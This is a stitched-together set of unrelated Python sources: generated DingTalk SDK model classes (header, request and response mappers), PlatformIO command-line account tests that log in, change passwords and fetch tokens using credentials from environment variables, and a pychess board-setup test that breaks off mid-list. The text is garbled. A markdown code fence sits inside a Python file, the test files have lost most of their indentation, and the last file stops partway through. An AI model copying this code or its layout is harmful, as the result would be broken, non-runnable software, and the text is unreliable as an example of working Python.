        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = GetCorpInfoResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self


class GetUserInfoHeaders(TeaModel):
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        service_group: str = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.service_group = service_group
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.service_group is not None:
            result['serviceGroup'] = self.service_group
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('serviceGroup') is not None:
            self.service_group = m.get('serviceGroup')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self


class GetUserInfoResponseBody(TeaModel):
    def __init__(
        self,
        is_real_name: str = None,
        user_real_name: str = None,
    ):
        self.is_real_name = is_real_name
        self.user_real_name = user_real_name

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.is_real_name is not None:
            result['isRealName'] = self.is_real_name
        if self.user_real_name is not None:
            result['userRealName'] = self.user_real_name
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('isRealName') is not None:
            self.is_real_name = m.get('isRealName')
        if m.get('userRealName') is not None:
            self.user_real_name = m.get('userRealName')
        return self


class GetUserInfoResponse(TeaModel):
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: GetUserInfoResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = GetUserInfoResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self


class GetExecuteUrlHeaders(TeaModel):
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        service_group: str = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.service_group = service_group
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.service_group is not None:
            result['serviceGroup'] = self.service_group
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('serviceGroup') is not None:
            self.service_group = m.get('serviceGroup')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self


class GetExecuteUrlRequest(TeaModel):
    def __init__(
        self,
        task_id: str = None,
        sign_container: int = None,
        ding_corp_id: str = None,
        account: str = None,
    ):
        self.task_id = task_id
        self.sign_container = sign_container
        self.ding_corp_id = ding_corp_id
        self.account = account

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.task_id is not None:
            result['taskId'] = self.task_id
        if self.sign_container is not None:
            result['signContainer'] = self.sign_container
        if self.ding_corp_id is not None:
            result['dingCorpId'] = self.ding_corp_id
        if self.account is not None:
            result['account'] = self.account
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('taskId') is not None:
            self.task_id = m.get('taskId')
        if m.get('signContainer') is not None:
            self.sign_container = m.get('signContainer')
        if m.get('dingCorpId') is not None:
            self.ding_corp_id = m.get('dingCorpId')
        if m.get('account') is not None:
            self.account = m.get('account')
        return self


class GetExecuteUrlResponseBody(TeaModel):
    def __init__(
        self,
        mobile_url: str = None,
        pc_url: str = None,
        long_url: str = None,
        short_url: str = None,
    ):
        self.mobile_url = mobile_url
        self.pc_url = pc_url
        self.long_url = long_url
        self.short_url = short_url

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.mobile_url is not None:
            result['mobileUrl'] = self.mobile_url
        if self.pc_url is not None:
            result['pcUrl'] = self.pc_url
        if self.long_url is not None:
            result['longUrl'] = self.long_url
        if self.short_url is not None:
            result['shortUrl'] = self.short_url
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('mobileUrl') is not None:
            self.mobile_url = m.get('mobileUrl')
        if m.get('pcUrl') is not None:
            self.pc_url = m.get('pcUrl')
        if m.get('longUrl') is not None:
            self.long_url = m.get('longUrl')
        if m.get('shortUrl') is not None:
            self.short_url = m.get('shortUrl')
        return self


class GetExecuteUrlResponse(TeaModel):
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: GetExecuteUrlResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = GetExecuteUrlResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self


class GetContractMarginHeaders(TeaModel):
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        service_group: str = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.service_group = service_group
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.service_group is not None:
            result['serviceGroup'] = self.service_group
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('serviceGroup') is not None:
            self.service_group = m.get('serviceGroup')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self


class GetContractMarginResponseBody(TeaModel):
    def __init__(
        self,
        margin: float = None,
    ):
        self.margin = margin

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.margin is not None:
            result['margin'] = self.margin
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('margin') is not None:
            self.margin = m.get('margin')
        return self


class GetContractMarginResponse(TeaModel):
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: GetContractMarginResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = GetContractMarginResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self


class CreateDevelopersHeaders(TeaModel):
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        service_group: str = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.service_group = service_group
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.service_group is not None:
            result['serviceGroup'] = self.service_group
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('serviceGroup') is not None:
            self.service_group = m.get('serviceGroup')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self


class CreateDevelopersRequest(TeaModel):
    def __init__(
        self,
        ding_corp_id: str = None,
        notice_url: str = None,
    ):
        self.ding_corp_id = ding_corp_id
        self.notice_url = notice_url

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.ding_corp_id is not None:
            result['dingCorpId'] = self.ding_corp_id
        if self.notice_url is not None:
            result['noticeUrl'] = self.notice_url
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('dingCorpId') is not None:
            self.ding_corp_id = m.get('dingCorpId')
        if m.get('noticeUrl') is not None:
            self.notice_url = m.get('noticeUrl')
        return self


class CreateDevelopersResponseBody(TeaModel):
    def __init__(
        self,
        data: bool = None,
    ):
        self.data = data

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.data is not None:
            result['data'] = self.data
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('data') is not None:
            self.data = m.get('data')
        return self


class CreateDevelopersResponse(TeaModel):
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: CreateDevelopersResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = CreateDevelopersResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self


class CorpRealnameHeaders(TeaModel):
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        service_group: str = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.service_group = service_group
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.service_group is not None:
            result['serviceGroup'] = self.service_group
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('serviceGroup') is not None:
            self.service_group = m.get('serviceGroup')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self


class CorpRealnameRequest(TeaModel):
    def __init__(
        self,
        ding_corp_id: str = None,
        user_id: str = None,
        redirect_url: str = None,
    ):
        self.ding_corp_id = ding_corp_id
        self.user_id = user_id
        self.redirect_url = redirect_url

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.ding_corp_id is not None:
            result['dingCorpId'] = self.ding_corp_id
        if self.user_id is not None:
            result['userId'] = self.user_id
        if self.redirect_url is not None:
            result['redirectUrl'] = self.redirect_url
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('dingCorpId') is not None:
            self.ding_corp_id = m.get('dingCorpId')
        if m.get('userId') is not None:
            self.user_id = m.get('userId')
        if m.get('redirectUrl') is not None:
            self.redirect_url = m.get('redirectUrl')
        return self


class CorpRealnameResponseBody(TeaModel):
    def __init__(
        self,
        task_id: str = None,
        pc_url: str = None,
        mobile_url: str = None,
    ):
        self.task_id = task_id
        self.pc_url = pc_url
        self.mobile_url = mobile_url

    def validate(self):
        pass

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.task_id is not None:
            result['taskId'] = self.task_id
        if self.pc_url is not None:
            result['pcUrl'] = self.pc_url
        if self.mobile_url is not None:
            result['mobileUrl'] = self.mobile_url
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('taskId') is not None:
            self.task_id = m.get('taskId')
        if m.get('pcUrl') is not None:
            self.pc_url = m.get('pcUrl')
        if m.get('mobileUrl') is not None:
            self.mobile_url = m.get('mobileUrl')
        return self


class CorpRealnameResponse(TeaModel):
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: CorpRealnameResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = CorpRealnameResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
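# A detail worth noting in the *Headers models above: the snake_case Python
# attribute maps to a hyphenated wire key ('x-acs-dingtalk-access-token'), so
# the map key and the attribute name differ. A minimal self-contained sketch
# of that mapping (the `Headers` name is a hypothetical stand-in, written
# without the TeaModel base class so it runs on its own):

```python
class Headers:
    """Hypothetical stand-in for the *Headers models above."""

    def __init__(self, x_acs_dingtalk_access_token=None):
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def to_map(self):
        result = dict()
        if self.x_acs_dingtalk_access_token is not None:
            # snake_case attribute maps to the hyphenated HTTP header name
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self


h = Headers(x_acs_dingtalk_access_token='token123')
assert h.to_map() == {'x-acs-dingtalk-access-token': 'token123'}
# from_map() returns self, so hydration can be chained in one expression
assert Headers().from_map(h.to_map()).x_acs_dingtalk_access_token == 'token123'
```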
# File: tests/commands/test_account.py (from Teja-Nagoori/platformio-core, Apache-2.0)
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import time
import pytest
from platformio.commands.account import cli as cmd_account
pytestmark = pytest.mark.skipif(
not (
os.environ.get("PLATFORMIO_TEST_ACCOUNT_LOGIN")
and os.environ.get("PLATFORMIO_TEST_ACCOUNT_PASSWORD")
),
    reason="requires PLATFORMIO_TEST_ACCOUNT_LOGIN and PLATFORMIO_TEST_ACCOUNT_PASSWORD environment variables",
)
@pytest.fixture(scope="session")
def credentials():
return {
"login": os.environ["PLATFORMIO_TEST_ACCOUNT_LOGIN"],
"password": os.environ["PLATFORMIO_TEST_ACCOUNT_PASSWORD"],
}
def test_account_register_with_already_exists_username(
clirunner, credentials, isolated_pio_home
):
username = credentials["login"]
email = "test@test.com"
if "@" in credentials["login"]:
username = "Testusername"
email = credentials["login"]
result = clirunner.invoke(
cmd_account,
[
"register",
"-u",
username,
"-e",
email,
"-p",
credentials["password"],
"--firstname",
"First",
"--lastname",
"Last",
],
)
assert result.exit_code > 0
assert result.exception
assert "User with same username already exists" in str(
result.exception
) or "User with same email already exists" in str(result.exception)
@pytest.mark.skip_ci
def test_account_login_with_invalid_creds(clirunner, credentials, isolated_pio_home):
result = clirunner.invoke(cmd_account, ["login", "-u", "123", "-p", "123"])
assert result.exit_code > 0
assert result.exception
assert "Invalid user credentials" in str(result.exception)
def test_account_login(clirunner, credentials, validate_cliresult, isolated_pio_home):
try:
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
assert "Successfully logged in!" in result.output
with open(str(isolated_pio_home.join("appstate.json"))) as fp:
appstate = json.load(fp)
assert appstate.get("account")
assert appstate.get("account").get("email")
assert appstate.get("account").get("username")
assert appstate.get("account").get("auth")
assert appstate.get("account").get("auth").get("access_token")
assert appstate.get("account").get("auth").get("access_token_expire")
assert appstate.get("account").get("auth").get("refresh_token")
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
assert result.exit_code > 0
assert result.exception
assert "You are already authorized with" in str(result.exception)
finally:
clirunner.invoke(cmd_account, ["logout"])
def test_account_logout(clirunner, credentials, validate_cliresult, isolated_pio_home):
try:
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(cmd_account, ["logout"])
validate_cliresult(result)
assert "Successfully logged out" in result.output
result = clirunner.invoke(cmd_account, ["logout"])
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_password_change_with_invalid_old_password(
clirunner, credentials, validate_cliresult
):
try:
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account,
["password", "--old-password", "test", "--new-password", "test"],
)
        assert result.exit_code > 0
        assert result.exception
        # both passwords are invalid here; the server validates and reports the
        # new_password format error before checking the old password
        assert (
            "Invalid request data for new_password -> "
            "'Password must contain at least 8 "
            "characters including a number and a lowercase letter'"
            in str(result.exception)
        )
finally:
clirunner.invoke(cmd_account, ["logout"])
def test_account_password_change_with_invalid_new_password_format(
clirunner, credentials, validate_cliresult
):
try:
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account,
[
"password",
"--old-password",
credentials["password"],
"--new-password",
"test",
],
)
assert result.exit_code > 0
assert result.exception
assert (
"Invalid request data for new_password -> "
"'Password must contain at least 8 characters"
" including a number and a lowercase letter'" in str(result.exception)
)
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_password_change(
clirunner, credentials, validate_cliresult, isolated_pio_home
):
try:
result = clirunner.invoke(
cmd_account,
[
"password",
"--old-password",
credentials["password"],
"--new-password",
"Testpassword123",
],
)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account,
[
"password",
"--old-password",
credentials["password"],
"--new-password",
"Testpassword123",
],
)
validate_cliresult(result)
assert "Password successfully changed!" in result.output
result = clirunner.invoke(cmd_account, ["logout"])
validate_cliresult(result)
result = clirunner.invoke(
cmd_account, ["login", "-u", credentials["login"], "-p", "Testpassword123"],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account,
[
"password",
"--old-password",
"Testpassword123",
"--new-password",
credentials["password"],
],
)
validate_cliresult(result)
assert "Password successfully changed!" in result.output
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_token_with_invalid_password(
clirunner, credentials, validate_cliresult
):
try:
result = clirunner.invoke(
cmd_account, ["token", "--password", credentials["password"],],
)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(cmd_account, ["token", "--password", "test",],)
assert result.exit_code > 0
assert result.exception
assert "Invalid user password" in str(result.exception)
finally:
clirunner.invoke(cmd_account, ["logout"])
def test_account_token(clirunner, credentials, validate_cliresult, isolated_pio_home):
try:
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account, ["token", "--password", credentials["password"],],
)
validate_cliresult(result)
assert "Personal Authentication Token:" in result.output
token = result.output.strip().split(": ")[-1]
result = clirunner.invoke(
cmd_account,
["token", "--password", credentials["password"], "--json-output"],
)
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result
assert json_result.get("status") == "success"
assert json_result.get("result") == token
token = json_result.get("result")
clirunner.invoke(cmd_account, ["logout"])
result = clirunner.invoke(
cmd_account, ["token", "--password", credentials["password"],],
)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
os.environ["PLATFORMIO_AUTH_TOKEN"] = token
result = clirunner.invoke(
cmd_account,
["token", "--password", credentials["password"], "--json-output"],
)
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result
assert json_result.get("status") == "success"
assert json_result.get("result") == token
os.environ.pop("PLATFORMIO_AUTH_TOKEN")
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_token_with_refreshing(
clirunner, credentials, validate_cliresult, isolated_pio_home
):
try:
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account,
["token", "--password", credentials["password"], "--json-output"],
)
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result
assert json_result.get("status") == "success"
assert json_result.get("result")
token = json_result.get("result")
result = clirunner.invoke(
cmd_account,
[
"token",
"--password",
credentials["password"],
"--json-output",
"--regenerate",
],
)
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result
assert json_result.get("status") == "success"
assert json_result.get("result")
assert token != json_result.get("result")
finally:
clirunner.invoke(cmd_account, ["logout"])
def test_account_summary(clirunner, credentials, validate_cliresult, isolated_pio_home):
try:
result = clirunner.invoke(cmd_account, ["show"],)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(cmd_account, ["show", "--json-output", "--offline"])
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert not json_result.get("user_id")
assert json_result.get("profile")
assert json_result.get("profile").get("username")
assert json_result.get("profile").get("email")
assert not json_result.get("packages")
assert not json_result.get("subscriptions")
result = clirunner.invoke(cmd_account, ["show"])
validate_cliresult(result)
assert credentials["login"] in result.output
assert "Community" in result.output
assert "100 Concurrent Remote Agents" in result.output
result = clirunner.invoke(cmd_account, ["show", "--json-output"])
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result.get("user_id")
assert json_result.get("profile")
assert json_result.get("profile").get("username")
assert json_result.get("profile").get("email")
assert credentials["login"] == json_result.get("profile").get(
"username"
) or credentials["login"] == json_result.get("profile").get("email")
assert json_result.get("profile").get("firstname")
assert json_result.get("profile").get("lastname")
assert json_result.get("packages")
assert json_result.get("packages")[0].get("name")
assert json_result.get("packages")[0].get("path")
assert json_result.get("subscriptions") is not None
result = clirunner.invoke(cmd_account, ["show", "--json-output", "--offline"])
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result.get("user_id")
assert json_result.get("profile")
assert json_result.get("profile").get("username")
assert json_result.get("profile").get("email")
assert credentials["login"] == json_result.get("profile").get(
"username"
) or credentials["login"] == json_result.get("profile").get("email")
assert json_result.get("profile").get("firstname")
assert json_result.get("profile").get("lastname")
assert json_result.get("packages")
assert json_result.get("packages")[0].get("name")
assert json_result.get("packages")[0].get("path")
assert json_result.get("subscriptions") is not None
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_profile_update_with_invalid_password(
clirunner, credentials, validate_cliresult
):
try:
result = clirunner.invoke(
cmd_account, ["update", "--current-password", credentials["password"]],
)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
firstname = "First " + str(int(time.time() * 1000))
result = clirunner.invoke(
cmd_account,
["update", "--current-password", "test", "--firstname", firstname],
)
assert result.exit_code > 0
assert result.exception
assert "Invalid user password" in str(result.exception)
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_profile_update_only_firstname_and_lastname(
clirunner, credentials, validate_cliresult, isolated_pio_home
):
try:
result = clirunner.invoke(
cmd_account, ["update", "--current-password", credentials["password"]],
)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
firstname = "First " + str(int(time.time() * 1000))
lastname = "Last" + str(int(time.time() * 1000))
result = clirunner.invoke(
cmd_account,
[
"update",
"--current-password",
credentials["password"],
"--firstname",
firstname,
"--lastname",
lastname,
],
)
validate_cliresult(result)
assert "Profile successfully updated!" in result.output
result = clirunner.invoke(cmd_account, ["show", "--json-output"])
validate_cliresult(result)
json_result = json.loads(result.output.strip())
assert json_result.get("profile").get("firstname") == firstname
assert json_result.get("profile").get("lastname") == lastname
finally:
clirunner.invoke(cmd_account, ["logout"])
@pytest.mark.skip_ci
def test_account_profile_update(
clirunner, credentials, validate_cliresult, isolated_pio_home
):
try:
result = clirunner.invoke(
cmd_account, ["update", "--current-password", credentials["password"]],
)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account,
["login", "-u", credentials["login"], "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(cmd_account, ["show", "--json-output"])
validate_cliresult(result)
json_result = json.loads(result.output.strip())
firstname = "First " + str(int(time.time() * 1000))
lastname = "Last" + str(int(time.time() * 1000))
old_username = json_result.get("profile").get("username")
new_username = "username" + str(int(time.time() * 1000))[-5:]
result = clirunner.invoke(
cmd_account,
[
"update",
"--current-password",
credentials["password"],
"--firstname",
firstname,
"--lastname",
lastname,
"--username",
new_username,
],
)
validate_cliresult(result)
assert "Profile successfully updated!" in result.output
assert "Please re-login." in result.output
result = clirunner.invoke(cmd_account, ["show"],)
assert result.exit_code > 0
assert result.exception
assert "You are not authorized! Please log in to PIO Account" in str(
result.exception
)
result = clirunner.invoke(
cmd_account, ["login", "-u", new_username, "-p", credentials["password"]],
)
validate_cliresult(result)
result = clirunner.invoke(
cmd_account,
[
"update",
"--current-password",
credentials["password"],
"--username",
old_username,
],
)
validate_cliresult(result)
assert "Profile successfully updated!" in result.output
assert "Please re-login." in result.output
result = clirunner.invoke(
cmd_account, ["login", "-u", old_username, "-p", credentials["password"]],
)
validate_cliresult(result)
finally:
clirunner.invoke(cmd_account, ["logout"])
# tests/test_setupboard.py (mpunkenhofer/pychess, MIT)
# Mathias Punkenhofer
# code.mpunkenhofer@gmail.com
#
import unittest
import pychess
class SetupBoardTests(unittest.TestCase):
def test_setup_empty_fen(self):
board = pychess.board.SetupBoard()
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['........',
'........',
'........',
'........',
'........',
'........',
'........',
'........'
])
def test_setup_standard_position(self):
board = pychess.board.SetupBoard('rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1')
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['rnbqkbnr',
'pppppppp',
'........',
'........',
'........',
'........',
'PPPPPPPP',
'RNBQKBNR'
])
def test_setup_position_1_e4(self):
board = pychess.board.SetupBoard('rnbqkbnr/pppppppp/8/8/4P3/8/PPPP1PPP/RNBQKBNR b KQkq e3 0 1')
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['rnbqkbnr',
'pppppppp',
'........',
'........',
'....P...',
'........',
'PPPP.PPP',
'RNBQKBNR'
])
def test_setup_position_1_e4_c5(self):
board = pychess.board.SetupBoard('rnbqkbnr/pp1ppppp/8/2p5/4P3/8/PPPP1PPP/RNBQKBNR w KQkq c6 0 2')
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['rnbqkbnr',
'pp.ppppp',
'........',
'..p.....',
'....P...',
'........',
'PPPP.PPP',
'RNBQKBNR'
])
def test_setup_position_1_e4_c5_2_Nf3(self):
board = pychess.board.SetupBoard('rnbqkbnr/pp1ppppp/8/2p5/4P3/5N2/PPPP1PPP/RNBQKB1R b KQkq - 1 2')
str_board = pychess.util.board.to_string_array(board)
self.assertEqual(str_board, ['rnbqkbnr',
'pp.ppppp',
'........',
